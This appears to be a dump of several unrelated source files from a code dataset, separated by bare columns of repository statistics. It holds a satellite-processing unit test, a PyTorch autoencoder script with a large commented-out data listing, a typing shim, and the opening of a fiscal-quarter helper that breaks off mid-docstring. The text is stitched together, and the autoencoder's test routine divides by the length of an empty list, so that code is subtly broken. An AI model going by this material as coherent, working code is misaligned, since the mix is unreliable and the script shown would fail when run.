s1TemporalFilter=4,
postProcessors=[
dict(name='APostProcessor',
type=0,
inputTypes=['Sentinel-2'],
indicatorNames=['indicator_0', 'indicator_3'],
variableNames=['variable_1', 'variable_2'])])
)
self.assertEqual('bibo', input_request.name)
self.assertEqual('POLYGON ((7.890891 51.997565, 7.890891 53.066801, 9.033867000000001 53.066801, '
'9.033867000000001 51.997565, 7.890891 51.997565))', input_request.roi)
self.assertEqual(('2018-07-06', '2018-07-20'), input_request.time_range)
self.assertEqual(4, input_request.time_step)
self.assertEqual('days', input_request.time_step_unit)
self.assertEqual(20, input_request.spatialResolution)
self.assertEqual(['S2_L1C'], input_request.input_types)
self.assertEqual('s1_sail', input_request.forward_models[0]['name'])
self.assertEqual('kafka', input_request.forward_models[0]['type'])
self.assertEqual('Sentinel-1', input_request.forward_models[0]['modelDataType'])
self.assertEqual('rgwf6', input_request.forward_models[0]['requiredPriors'][0])
self.assertEqual('fg6', input_request.forward_models[0]['requiredPriors'][1])
self.assertEqual('LAI', input_request.forward_models[0]['outputParameters'][0])
self.assertEqual(3, len(input_request.user_priors))
self.assertEqual('LAI', input_request.user_priors[0]['name'])
self.assertEqual(0.2, input_request.user_priors[0]['mu'])
self.assertEqual(0.01, input_request.user_priors[0]['unc'])
self.assertEqual('ALA', input_request.user_priors[1]['name'])
self.assertEqual(1.3, input_request.user_priors[1]['mu'])
self.assertEqual('fzxh', input_request.user_priors[2]['name'])
self.assertEqual(0.01, input_request.user_priors[2]['unc'])
self.assertEqual(4, input_request.s1_temporal_filter)
self.assertIsNone(input_request.s2_compute_roi)
self.assertIsNotNone(input_request.post_processors)
self.assertEqual(1, len(input_request.post_processors))
self.assertEqual('APostProcessor', input_request.post_processors[0]['name'])
self.assertEqual(0, input_request.post_processors[0]['type'])
self.assertEqual(1, len(input_request.post_processors[0]['inputTypes']))
self.assertEqual('Sentinel-2', input_request.post_processors[0]['inputTypes'][0])
self.assertEqual(2, len(input_request.post_processors[0]['indicatorNames']))
self.assertEqual('indicator_0', input_request.post_processors[0]['indicatorNames'][0])
self.assertEqual('indicator_3', input_request.post_processors[0]['indicatorNames'][1])
self.assertEqual(2, len(input_request.post_processors[0]['variableNames']))
self.assertEqual('variable_1', input_request.post_processors[0]['variableNames'][0])
self.assertEqual('variable_2', input_request.post_processors[0]['variableNames'][1])
self.assertIsNotNone(input_request._repr_html_())
def test_processing_request(self):
input_request = ProcessingRequest(dict(name='bibo',
roi='POLYGON ((7.890891 51.997565, 7.890891 53.066801, '
'9.033867000000001 53.066801, 9.033867000000001 51.997565, '
'7.890891 51.997565))',
timeRange=['2018-07-06', '2018-07-20'],
timeStep=4,
timeStepUnit='days',
spatialResolution=20,
inputTypes=['S2_L1C'],
forwardModels=[dict(
name='s1_sail',
type='kafka',
modelDataType='Sentinel-1',
requiredPriors=['rgwf6', 'fg6'],
outputParameters=['LAI'],
)],
userPriors=[
dict(name='LAI',
mu=0.2,
unc=0.01),
dict(name='ALA',
mu=1.3),
dict(name='fzxh',
unc=0.01)],
s2ComputeRoi=False,
postProcessors=[
dict(name='APostProcessor',
type=0,
inputTypes=['Sentinel-2'],
indicatorNames=['indicator_0', 'indicator_3'],
variableNames=['variable_1', 'variable_2'])],
inputIdentifiers={'S2_L1C': ['IID1', 'IID2', 'IID3']}))
self.assertEqual('bibo', input_request.name)
self.assertEqual('POLYGON ((7.890891 51.997565, 7.890891 53.066801, 9.033867000000001 53.066801, '
'9.033867000000001 51.997565, 7.890891 51.997565))', input_request.roi)
self.assertEqual(('2018-07-06', '2018-07-20'), input_request.time_range)
self.assertEqual(4, input_request.time_step)
self.assertEqual('days', input_request.time_step_unit)
self.assertEqual(20, input_request.spatialResolution)
self.assertEqual(['S2_L1C'], input_request.input_types)
self.assertEqual('s1_sail', input_request.forward_models[0]['name'])
self.assertEqual('kafka', input_request.forward_models[0]['type'])
self.assertEqual('Sentinel-1', input_request.forward_models[0]['modelDataType'])
self.assertEqual('rgwf6', input_request.forward_models[0]['requiredPriors'][0])
self.assertEqual('fg6', input_request.forward_models[0]['requiredPriors'][1])
self.assertEqual('LAI', input_request.forward_models[0]['outputParameters'][0])
self.assertEqual(3, len(input_request.user_priors))
self.assertEqual('LAI', input_request.user_priors[0]['name'])
self.assertEqual(0.2, input_request.user_priors[0]['mu'])
self.assertEqual(0.01, input_request.user_priors[0]['unc'])
self.assertEqual('ALA', input_request.user_priors[1]['name'])
self.assertEqual(1.3, input_request.user_priors[1]['mu'])
self.assertEqual('fzxh', input_request.user_priors[2]['name'])
self.assertEqual(0.01, input_request.user_priors[2]['unc'])
self.assertIsNone(input_request.s1_temporal_filter)
self.assertFalse(input_request.s2_compute_roi)
self.assertIsNotNone(input_request.post_processors)
self.assertEqual(1, len(input_request.post_processors))
self.assertEqual('APostProcessor', input_request.post_processors[0]['name'])
self.assertEqual(0, input_request.post_processors[0]['type'])
self.assertEqual(1, len(input_request.post_processors[0]['inputTypes']))
self.assertEqual('Sentinel-2', input_request.post_processors[0]['inputTypes'][0])
self.assertEqual(2, len(input_request.post_processors[0]['indicatorNames']))
self.assertEqual('indicator_0', input_request.post_processors[0]['indicatorNames'][0])
self.assertEqual('indicator_3', input_request.post_processors[0]['indicatorNames'][1])
self.assertEqual(2, len(input_request.post_processors[0]['variableNames']))
self.assertEqual('variable_1', input_request.post_processors[0]['variableNames'][0])
self.assertEqual('variable_2', input_request.post_processors[0]['variableNames'][1])
self.assertIsInstance(input_request.inputs, InputIdentifiers)
self.assertIsNotNone(input_request._repr_html_())
def test_input_identifiers(self):
input_identifiers = InputIdentifiers({'S2_L1C': ['IID1', 'IID2', 'IID3']})
self.assertIsNotNone(input_identifiers._repr_html_())
| 67.942308
| 111
| 0.512312
| 950
| 10,599
| 5.516842
| 0.108421
| 0.174013
| 0.073268
| 0.119061
| 0.920435
| 0.918145
| 0.905934
| 0.892578
| 0.875787
| 0.875787
| 0
| 0.093938
| 0.371261
| 10,599
| 155
| 112
| 68.380645
| 0.692527
| 0
| 0
| 0.808219
| 0
| 0.013699
| 0.142655
| 0
| 0
| 0
| 0
| 0
| 0.506849
| 1
| 0.020548
| false
| 0
| 0.013699
| 0
| 0.041096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
807511de9e73287f0c7ccbc6617209b84be283ee
| 20,238
|
py
|
Python
|
EasyDeep/net_structures/AutoEncoder.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | 2
|
2020-04-06T09:09:19.000Z
|
2020-07-24T03:59:55.000Z
|
EasyDeep/net_structures/AutoEncoder.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
EasyDeep/net_structures/AutoEncoder.py
|
strawsyz/straw
|
db313c78c2e3c0355cd10c70ac25a15bb5632d41
|
[
"MIT"
] | null | null | null |
import torch
from torch import nn
from torch.autograd import Variable
class CNNAutoEncoder(nn.Module):
def __init__(self):
super(CNNAutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(1, 16, 3, stride=3, padding=1),
nn.ReLU(True),
nn.MaxPool2d(2, stride=2),
nn.Conv2d(16, 8, 3, stride=2, padding=1),
nn.ReLU(True),
nn.MaxPool2d(2, stride=1)
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(8, 16, 3, stride=2),
nn.ReLU(True),
nn.ConvTranspose2d(16, 8, 5, stride=3, padding=1),
nn.ReLU(True),
nn.ConvTranspose2d(8, 1, 2, stride=2, padding=1),
nn.Tanh()
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
class LinearAutoEncoder(nn.Module):
def __init__(self):
super(LinearAutoEncoder, self).__init__()
self.encoder = nn.Sequential(
nn.Linear(3, 10),
nn.Sigmoid(),
nn.Linear(10, 2),
)
self.decoder = nn.Sequential(
# nn.Sigmoid(),
nn.Linear(2, 10),
nn.Sigmoid(),
nn.Linear(10, 3)
)
def forward(self, x):
encoder_output = self.encoder(x)
output = self.decoder(encoder_output)
return output, encoder_output
def train(num_epoch=float("inf"), min_loss=0.00001, max_try_times=None):
last_loss = float("inf")
try_times = 0
epoch = 0
while True:
train_loss = train_one_epoch(epoch)
if train_loss > last_loss:
try_times += 1
else:
try_times = 0
last_loss = train_loss
if try_times is not None and try_times == max_try_times:
print("loss don't decrease in {} epoch".format(max_try_times))
break
if train_loss < min_loss:
break
if num_epoch < epoch:
break
epoch += 1
# save model
torch.save(net.state_dict(), model_save_path)
def train_one_epoch(epoch):
train_loss = 0
net.train()
global data
for sample, label in train_data:
sample = Variable(torch.from_numpy(sample)).double()
label = Variable(torch.from_numpy(label)).double()
optimizer.zero_grad()
out = net(sample)[0]
loss = loss_function(out, label)
loss.backward()
optimizer.step()
train_loss += loss.data
train_loss = train_loss / len(train_data)
print("epoch:{} \t train loss \t {}".format(epoch, train_loss))
return train_loss
def test():
all_loss = 0
net.load_state_dict(torch.load(model_save_path))
net.eval()
hidden_values = []
for i, (data, gt) in enumerate(train_data):
data = Variable(torch.from_numpy(data)).double()
gt = Variable(torch.from_numpy(gt)).double()
optimizer.zero_grad()
out, hidden_ouput = net(data)
batch_loss = loss_function(out, gt)
all_loss += batch_loss
hidden_values.append(hidden_ouput.data.numpy().tolist())
# print("m:{},n:{} output of the hidden layer {}".format(m, n, hidden_ouput.data))
print(M_N)
print(hidden_values)
from sklearn.linear_model import LinearRegression
model = LinearRegression()
from sklearn.model_selection import cross_val_score
def rmse_cv(model, x, y):
return np.sqrt(-cross_val_score(model, x, y, scoring="neg_mean_squared_error", cv=5))
hidden_output0 = [d[0] for d in hidden_values]
hidden_output1 = [d[1] for d in hidden_values]
from scipy.stats import pearsonr
M = [d[0] for d in M_N]
N = [d[1] for d in M_N]
print("pearsonr between M and hidden_output0 is ", pearsonr(M, hidden_output0))
print("pearsonr between N and hidden_output0 is ", pearsonr(N, hidden_output0))
print("pearsonr between M and hidden_output1 is ", pearsonr(M, hidden_output1))
print("pearsonr between N and hidden_output1 is ", pearsonr(N, hidden_output1))
score = rmse_cv(model, M_N, hidden_output0)
print("{}: {:6f}, {:6f}".format("LR", score.mean(), score.std()))
score = rmse_cv(model, M_N, hidden_output1)
print("{}: {:6f}, {:6f}".format("LR", score.mean(), score.std()))
print("train loss \t {}".format(all_loss / len(test_data)))
def set_seed(random_state):
import torch
import numpy as np
import random
if random_state is not None:
torch.manual_seed(random_state) # cpu
torch.cuda.manual_seed(random_state) # gpu
torch.cuda.manual_seed_all(random_state)
np.random.seed(random_state) # numpy
random.seed(random_state) # random and transforms
torch.backends.cudnn.deterministic = True # cudnn
if __name__ == '__main__':
import numpy as np
set_seed(0)
model_save_path = "AutoEncoder3.pkl"
net = LinearAutoEncoder().double()
loss_function = torch.nn.MSELoss()
optimizer = torch.optim.SGD(net.parameters(), lr=0.003, weight_decay=0.0001)
# prepare data
train_data = []
last_loss = 0
M_N = []
for i in range(100):
m = np.random.rand() * np.pi * 2
n = np.random.rand() * np.pi / 2
M_N.append([m, n])
x = np.cos(m) * np.sin(n)
y = np.sin(m) * np.sin(n)
z = np.cos(n)
train_data.append((np.array([x, y, z], dtype=np.float32), np.array([x, y, z], dtype=np.float32)))
print("train_data", train_data)
# [(array([-0.13771854, 0.8910034 , 0.43260443], dtype=float32), array([-0.13771854, 0.8910034 , 0.43260443], dtype=float32)), (array([-0.23958386, 0.7161484 , 0.65553874], dtype=float32), array([-0.23958386, 0.7161484 , 0.65553874], dtype=float32)), (array([0.20174214, 0.82494247, 0.52798676], dtype=float32), array([0.20174214, 0.82494247, 0.52798676], dtype=float32)), (array([0.19201311, 0.96669924, 0.16918488], dtype=float32), array([0.19201311, 0.96669924, 0.16918488], dtype=float32)), (array([-0.56285876, 0.06453473, 0.8240299 ], dtype=float32), array([-0.56285876, 0.06453473, 0.8240299 ], dtype=float32)), (array([-0.5859435 , 0.4494396 , 0.67429537], dtype=float32), array([-0.5859435 , 0.4494396 , 0.67429537], dtype=float32)), (array([-0.21069671, 0.9705719 , 0.11660665], dtype=float32), array([-0.21069671, 0.9705719 , 0.11660665], dtype=float32)), (array([0.13305213, 0.03019571, 0.9906489 ], dtype=float32), array([0.13305213, 0.03019571, 0.9906489 ], dtype=float32)), (array([0.96368784, 0.06129395, 0.25990143], dtype=float32), array([0.96368784, 0.06129395, 0.25990143], dtype=float32)), (array([-0.75088 , 0.62854123, 0.20276861], dtype=float32), array([-0.75088 , 0.62854123, 0.20276861], dtype=float32)), (array([-0.9485033 , 0.06380931, 0.31027377], dtype=float32), array([-0.9485033 , 0.06380931, 0.31027377], dtype=float32)), (array([0.11361801, 0.9342788 , 0.3379557 ], dtype=float32), array([0.11361801, 0.9342788 , 0.3379557 ], dtype=float32)), (array([0.78664774, 0.30653343, 0.5359315 ], dtype=float32), array([0.78664774, 0.30653343, 0.5359315 ], dtype=float32)), (array([0.8968932 , 0.43364447, 0.08680448], dtype=float32), array([0.8968932 , 0.43364447, 0.08680448], dtype=float32)), (array([-0.04158014, 0.6048326 , 0.7952664 ], dtype=float32), array([-0.04158014, 0.6048326 , 0.7952664 ], dtype=float32)), (array([0.63210136, 0.69272506, 0.3472461 ], dtype=float32), array([0.63210136, 0.69272506, 0.3472461 ], dtype=float32)), (array([0.10695912, 0.7715111 , 0.6271606 ], dtype=float32), array([0.10695912, 0.7715111 , 0.6271606 ], dtype=float32)), (array([0.8235503 , 0.04867063, 0.5651514 ], dtype=float32), array([0.8235503 , 0.04867063, 0.5651514 ], dtype=float32)), (array([-0.2843439, 0.7737729, 0.5660601], dtype=float32), array([-0.2843439, 0.7737729, 0.5660601], dtype=float32)), (array([-0.86401117, 0.1542982 , 0.47924608], dtype=float32), array([-0.86401117, 0.1542982 , 0.47924608], dtype=float32)), (array([0.27075577, 0.57308394, 0.77347666], dtype=float32), array([0.27075577, 0.57308394, 0.77347666], dtype=float32)), (array([-0.05495249, 0.07683155, 0.9955286 ], dtype=float32), array([-0.05495249, 0.07683155, 0.9955286 ], dtype=float32)), (array([-0.43480033, 0.7525499 , 0.49458808], dtype=float32), array([-0.43480033, 0.7525499 , 0.49458808], dtype=float32)), (array([0.15877993, 0.12346827, 0.9795634 ], dtype=float32), array([0.15877993, 0.12346827, 0.9795634 ], dtype=float32)), (array([0.29626966, 0.45235285, 0.84119034], dtype=float32), array([0.29626966, 0.45235285, 0.84119034], dtype=float32)), (array([-0.13906367, 0.62033355, 0.7719116 ], dtype=float32), array([-0.13906367, 0.62033355, 0.7719116 ], dtype=float32)), (array([-0.15949965, 0.00582826, 0.98718077], dtype=float32), array([-0.15949965, 0.00582826, 0.98718077], dtype=float32)), (array([0.19861837, 0.15294467, 0.96806955], dtype=float32), array([0.19861837, 0.15294467, 0.96806955], dtype=float32)), (array([-0.17926368, 0.34349096, 0.92188853], dtype=float32), array([-0.17926368, 0.34349096, 0.92188853], dtype=float32)), (array([0.03957067, 0.37248313, 0.92719495], dtype=float32), array([0.03957067, 0.37248313, 0.92719495], dtype=float32)), (array([0.15143952, 0.08261732, 0.9850078 ], dtype=float32), array([0.15143952, 0.08261732, 0.9850078 ], dtype=float32)), (array([-0.10156602, 0.18990242, 0.97653544], dtype=float32), array([-0.10156602, 0.18990242, 0.97653544], dtype=float32)), (array([0.44624254, 0.31695023, 0.8369051 ], dtype=float32), array([0.44624254, 0.31695023, 0.8369051 ], dtype=float32)), (array([-0.12853688, 0.08101049, 0.9883904 ], dtype=float32), array([-0.12853688, 0.08101049, 0.9883904 ], dtype=float32)), (array([-0.13130714, 0.07329462, 0.9886285 ], dtype=float32), array([-0.13130714, 0.07329462, 0.9886285 ], dtype=float32)), (array([-0.66960865, 0.04961123, 0.7410553 ], dtype=float32), array([-0.66960865, 0.04961123, 0.7410553 ], dtype=float32)), (array([-0.8113004 , 0.05933623, 0.5816106 ], dtype=float32), array([-0.8113004 , 0.05933623, 0.5816106 ], dtype=float32)), (array([-0.04200754, 0.0449414 , 0.998106 ], dtype=float32), array([-0.04200754, 0.0449414 , 0.998106 ], dtype=float32)), (array([0.11835478, 0.14566281, 0.98222935], dtype=float32), array([0.11835478, 0.14566281, 0.98222935], dtype=float32)), (array([0.11079678, 0.14867364, 0.98265976], dtype=float32), array([0.11079678, 0.14867364, 0.98265976], dtype=float32)), (array([0.3278174 , 0.50939465, 0.7956462 ], dtype=float32), array([0.3278174 , 0.50939465, 0.7956462 ], dtype=float32)), (array([0.8676541 , 0.17726044, 0.46449447], dtype=float32), array([0.8676541 , 0.17726044, 0.46449447], dtype=float32)), (array([-0.08410294, 0.3960722 , 0.9143596 ], dtype=float32), array([-0.08410294, 0.3960722 , 0.9143596 ], dtype=float32)), (array([-0.01072867, 0.14663452, 0.9891326 ], dtype=float32), array([-0.01072867, 0.14663452, 0.9891326 ], dtype=float32)), (array([-0.23487961, 0.965685 , 0.1108331 ], dtype=float32), array([-0.23487961, 0.965685 , 0.1108331 ], dtype=float32)), (array([0.46763715, 0.7296071 , 0.49898794], dtype=float32), array([0.46763715, 0.7296071 , 0.49898794], dtype=float32)), (array([0.8261037 , 0.36304036, 0.4309923 ], dtype=float32), array([0.8261037 , 0.36304036, 0.4309923 ], dtype=float32)), (array([0.17436205, 0.22392225, 0.95888305], dtype=float32), array([0.17436205, 0.22392225, 0.95888305], dtype=float32)), (array([-0.00847769, 0.03042039, 0.9995012 ], dtype=float32), array([-0.00847769, 0.03042039, 0.9995012 ], dtype=float32)), (array([-0.00633593, 0.00377559, 0.9999728 ], dtype=float32), array([-0.00633593, 0.00377559, 0.9999728 ], dtype=float32)), (array([-0.21811792, 0.3489671 , 0.9113981 ], dtype=float32), array([-0.21811792, 0.3489671 , 0.9113981 ], dtype=float32)), (array([-0.6722757 , 0.73791724, 0.05935918], dtype=float32), array([-0.6722757 , 0.73791724, 0.05935918], dtype=float32)), (array([0.5582719 , 0.55391526, 0.6176653 ], dtype=float32), array([0.5582719 , 0.55391526, 0.6176653 ], dtype=float32)), (array([-0.2231655, 0.7501454, 0.6224781], dtype=float32), array([-0.2231655, 0.7501454, 0.6224781], dtype=float32)), (array([0.7622019 , 0.64307815, 0.07415355], dtype=float32), array([0.7622019 , 0.64307815, 0.07415355], dtype=float32)), (array([0.16055879, 0.9576715 , 0.23892699], dtype=float32), array([0.16055879, 0.9576715 , 0.23892699], dtype=float32)), (array([-0.2641418 , 0.36481354, 0.8928271 ], dtype=float32), array([-0.2641418 , 0.36481354, 0.8928271 ], dtype=float32)), (array([-0.4863434 , 0.32210383, 0.812231 ], dtype=float32), array([-0.4863434 , 0.32210383, 0.812231 ], dtype=float32)), (array([-0.73681074, 0.2887741 , 0.611326 ], dtype=float32), array([-0.73681074, 0.2887741 , 0.611326 ], dtype=float32)), (array([-0.8251932 , 0.32152426, 0.46441174], dtype=float32), array([-0.8251932 , 0.32152426, 0.46441174], dtype=float32)), (array([-0.46061376, 0.53843784, 0.70563424], dtype=float32), array([-0.46061376, 0.53843784, 0.70563424], dtype=float32)), (array([-0.83961487, 0.11658006, 0.53052425], dtype=float32), array([-0.83961487, 0.11658006, 0.53052425], dtype=float32)), (array([0.19307858, 0.7916744 , 0.57963127], dtype=float32), array([0.19307858, 0.7916744 , 0.57963127], dtype=float32)), (array([0.45536417, 0.02749051, 0.8898808 ], dtype=float32), array([0.45536417, 0.02749051, 0.8898808 ], dtype=float32)), (array([-0.21220525, 0.38550192, 0.89797395], dtype=float32), array([-0.21220525, 0.38550192, 0.89797395], dtype=float32)), (array([-0.22599094, 0.58135164, 0.78163826], dtype=float32), array([-0.22599094, 0.58135164, 0.78163826], dtype=float32)), (array([0.41129866, 0.1864464 , 0.8922282 ], dtype=float32), array([0.41129866, 0.1864464 , 0.8922282 ], dtype=float32)), (array([-0.17453907, 0.7812475 , 0.59932333], dtype=float32), array([-0.17453907, 0.7812475 , 0.59932333], dtype=float32)), (array([-0.19789232, 0.832047 , 0.51820505], dtype=float32), array([-0.19789232, 0.832047 , 0.51820505], dtype=float32)), (array([-0.288328 , 0.55675024, 0.7790354 ], dtype=float32), array([-0.288328 , 0.55675024, 0.7790354 ], dtype=float32)), (array([-0.5172432 , 0.1742888 , 0.83790386], dtype=float32), array([-0.5172432 , 0.1742888 , 0.83790386], dtype=float32)), (array([0.1972488, 0.9656853, 0.1689521], dtype=float32), array([0.1972488, 0.9656853, 0.1689521], dtype=float32)), (array([-0.7331545 , 0.5111719 , 0.44853964], dtype=float32), array([-0.7331545 , 0.5111719 , 0.44853964], dtype=float32)), (array([0.94324124, 0.30722114, 0.12613949], dtype=float32), array([0.94324124, 0.30722114, 0.12613949], dtype=float32)), (array([-0.6233797 , 0.7819172 , 0.00181112], dtype=float32), array([-0.6233797 , 0.7819172 , 0.00181112], dtype=float32)), (array([0.872727 , 0.44277298, 0.20566884], dtype=float32), array([0.872727 , 0.44277298, 0.20566884], dtype=float32)), (array([0.71819526, 0.40218773, 0.56783855], dtype=float32), array([0.71819526, 0.40218773, 0.56783855], dtype=float32)), (array([0.89904577, 0.3684982 , 0.23648643], dtype=float32), array([0.89904577, 0.3684982 , 0.23648643], dtype=float32)), (array([-0.6410343 , 0.44358504, 0.62634444], dtype=float32), array([-0.6410343 , 0.44358504, 0.62634444], dtype=float32)), (array([0.03117225, 0.10385637, 0.99410367], dtype=float32), array([0.03117225, 0.10385637, 0.99410367], dtype=float32)), (array([-0.37993306, 0.5319161 , 0.75678015], dtype=float32), array([-0.37993306, 0.5319161 , 0.75678015], dtype=float32)), (array([-0.6282891 , 0.7495623 , 0.20834856], dtype=float32), array([-0.6282891 , 0.7495623 , 0.20834856], dtype=float32)), (array([-0.9715776 , 0.07486337, 0.2245718 ], dtype=float32), array([-0.9715776 , 0.07486337, 0.2245718 ], dtype=float32)), (array([0.5354349 , 0.01971338, 0.8443464 ], dtype=float32), array([0.5354349 , 0.01971338, 0.8443464 ], dtype=float32)), (array([-0.17612877, 0.1997908 , 0.96387875], dtype=float32), array([-0.17612877, 0.1997908 , 0.96387875], dtype=float32)), (array([-0.00562996, 0.08506421, 0.9963596 ], dtype=float32), array([-0.00562996, 0.08506421, 0.9963596 ], dtype=float32)), (array([0.02353438, 0.01709834, 0.9995768 ], dtype=float32), array([0.02353438, 0.01709834, 0.9995768 ], dtype=float32)), (array([-0.27466822, 0.20798938, 0.93877465], dtype=float32), array([-0.27466822, 0.20798938, 0.93877465], dtype=float32)), (array([0.46397662, 0.8786454 , 0.1127295 ], dtype=float32), array([0.46397662, 0.8786454 , 0.1127295 ], dtype=float32)), (array([-0.02994239, 0.04003269, 0.9987496 ], dtype=float32), array([-0.02994239, 0.04003269, 0.9987496 ], dtype=float32)), (array([0.7199542, 0.4097383, 0.5601612], dtype=float32), array([0.7199542, 0.4097383, 0.5601612], dtype=float32)), (array([-0.08770114, 0.3543535 , 0.93098986], dtype=float32), array([-0.08770114, 0.3543535 , 0.93098986], dtype=float32)), (array([-0.8042291 , 0.16861995, 0.5698973 ], dtype=float32), array([-0.8042291 , 0.16861995, 0.5698973 ], dtype=float32)), (array([-0.08932336, 0.79459494, 0.6005333 ], dtype=float32), array([-0.08932336, 0.79459494, 0.6005333 ], dtype=float32)), (array([-0.311367 , 0.3529037, 0.8823319], dtype=float32), array([-0.311367 , 0.3529037, 0.8823319], dtype=float32)), (array([0.1017431 , 0.3072791 , 0.94616485], dtype=float32), array([0.1017431 , 0.3072791 , 0.94616485], dtype=float32)), (array([0.8305629 , 0.55004495, 0.08726849], dtype=float32), array([0.8305629 , 0.55004495, 0.08726849], dtype=float32)), (array([-0.47602233, 0.50834805, 0.71762455], dtype=float32), array([-0.47602233, 0.50834805, 0.71762455], dtype=float32)), (array([0.29387048, 0.25486967, 0.92123914], dtype=float32), array([0.29387048, 0.25486967, 0.92123914], dtype=float32)), (array([0.6201913 , 0.11433277, 0.776074 ], dtype=float32), array([0.6201913 , 0.11433277, 0.776074 ], dtype=float32))]
# [[0.9795356522922227, 1.0938137944188668], [1.18674240320129, 0.28212079698952935], [0.07753051181414404, 0.10563547408078137], [2.1343753461250934, 0.7126653369070711], [1.6857133076881683, 1.4084879734501996], [3.111241561705335, 0.34070098638601287], [2.0831216116147973, 0.41362582214161814], [0.06487702821081996, 1.1912584037654694], [1.0053635300466017, 0.6023436764236842], [1.8482527219211597, 1.3054078608735808], [1.9760047390673172, 1.3707564441519273], [0.8593576470248048, 1.2535690353201518], [0.5831925188737834, 1.4966416349723537], [2.1598081185290696, 0.3385186676060782], [2.9762524873070286, 1.1480256166912846], [0.797781198817058, 0.3350696705101968], [1.6279755559695577, 0.04031090325563127], [0.6517864648455095, 0.6670943743580349], [1.1754896614118404, 0.72818257378463], [0.8721963041211681, 0.9217186960372356]]
# [[0.06563908835425439, -0.7720977442273214], [1.1631756158209972, -0.5837777859293005], [1.4623161383480292, -0.6805002113446853], [0.8134014425441641, 0.10330027353143034], [-0.2344741015305116, 0.1101995609349184], [1.5890313063193384, -0.09638451972966194], [1.1295468453653965, -0.17515950699052246], [0.5575299272155383, -1.6672933392984661], [0.7310732519781463, -0.7147024645890313], [-0.05056714785634639, 0.24431383831279307], [-0.02607609891451887, 0.39609874371008263], [-0.08251030076443641, -0.921431341223975], [-0.18151691350416324, -1.2629821798036653], [1.2330845321982808, -0.2181486299694734], [1.2191132783854026, 0.8062542287883501], [1.1290701649811263, -0.7465210082205535], [1.4731870661452182, -0.5305335903393239], [0.7447836793103239, -0.9915328141102466], [0.527914704953845, -0.5846415097766168], [0.3230757516333158, -0.8764978989194223]]
test_data = []
m_data = []
n_data = []
# for i in range(20):
# m = np.random.rand() * np.pi
# n = np.random.rand() * np.pi / 2
# m_data.append(m)
# n_data.append(n)
# x = np.cos(m) * np.sin(n)
# y = np.sin(m) * np.sin(n)
# z = np.cos(n)
# test_data.append((np.array([x, y, z]), np.array([x, y, z])))
# epoch:26661 train loss 0.0009999969872498738
# train(min_loss=0.001, max_try_times=10)
test()
| 107.079365
| 12,512
| 0.666074
| 2,799
| 20,238
| 4.761343
| 0.196499
| 0.090043
| 0.253846
| 0.268778
| 0.720117
| 0.695205
| 0.676821
| 0.666016
| 0.657012
| 0.646507
| 0
| 0.409112
| 0.147544
| 20,238
| 188
| 12,513
| 107.648936
| 0.363378
| 0.728432
| 0
| 0.183673
| 0
| 0
| 0.061586
| 0.00402
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061224
| false
| 0
| 0.068027
| 0.006803
| 0.170068
| 0.081633
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
807be52504bad528b206d95f52ad31ad42af8305
| 152
|
py
|
Python
|
crowdin_api/typing.py
|
dpaskov/crowdin-api-client-python
|
e3be5f5ba567ffd97fdeb3f11b54f81ccb74ad98
|
[
"MIT"
] | 13
|
2021-03-02T02:31:57.000Z
|
2022-03-05T20:03:38.000Z
|
crowdin_api/typing.py
|
dpaskov/crowdin-api-client-python
|
e3be5f5ba567ffd97fdeb3f11b54f81ccb74ad98
|
[
"MIT"
] | 17
|
2021-03-23T09:10:30.000Z
|
2022-03-17T10:05:25.000Z
|
crowdin_api/typing.py
|
dpaskov/crowdin-api-client-python
|
e3be5f5ba567ffd97fdeb3f11b54f81ccb74ad98
|
[
"MIT"
] | 6
|
2021-04-22T07:54:46.000Z
|
2021-12-30T19:38:44.000Z
|
import sys
if sys.version_info >= (3, 8):
from typing import TypedDict # noqa F401
else:
from typing_extensions import TypedDict # noqa F401
| 21.714286
| 56
| 0.717105
| 22
| 152
| 4.863636
| 0.636364
| 0.186916
| 0.35514
| 0.429907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067227
| 0.217105
| 152
| 6
| 57
| 25.333333
| 0.831933
| 0.125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
80aa11ce4fccc9cff91f2cd1d716f2381d7a349c
| 16,759
|
py
|
Python
|
determine_period.py
|
TransitionProjects/Agency-Metrics-FY-18-19
|
5f049445a7f1925156e18f3153027f5bfbab48c0
|
[
"MIT"
] | null | null | null |
determine_period.py
|
TransitionProjects/Agency-Metrics-FY-18-19
|
5f049445a7f1925156e18f3153027f5bfbab48c0
|
[
"MIT"
] | null | null | null |
determine_period.py
|
TransitionProjects/Agency-Metrics-FY-18-19
|
5f049445a7f1925156e18f3153027f5bfbab48c0
|
[
"MIT"
] | null | null | null |
"""
Takes dataframes from various ART reports and identifies the fiscal year and
quarter of each row of data, returning the results as a new dataframe object
"""
from datetime import datetime
import pandas as pd
import numpy as np
class QuarterAndFiscalYear:
def __init__(
self,
dataframe,
exit_date_fill_type=False,
exit_date_fill=datetime(year=2018, month=7, day=1),
fill_na=True
):
"""
:dataframe: a pandas dataframe object created from an HMIS ART excel file
:exit_date_fill_type: a string either "today" or "specify"; default is False
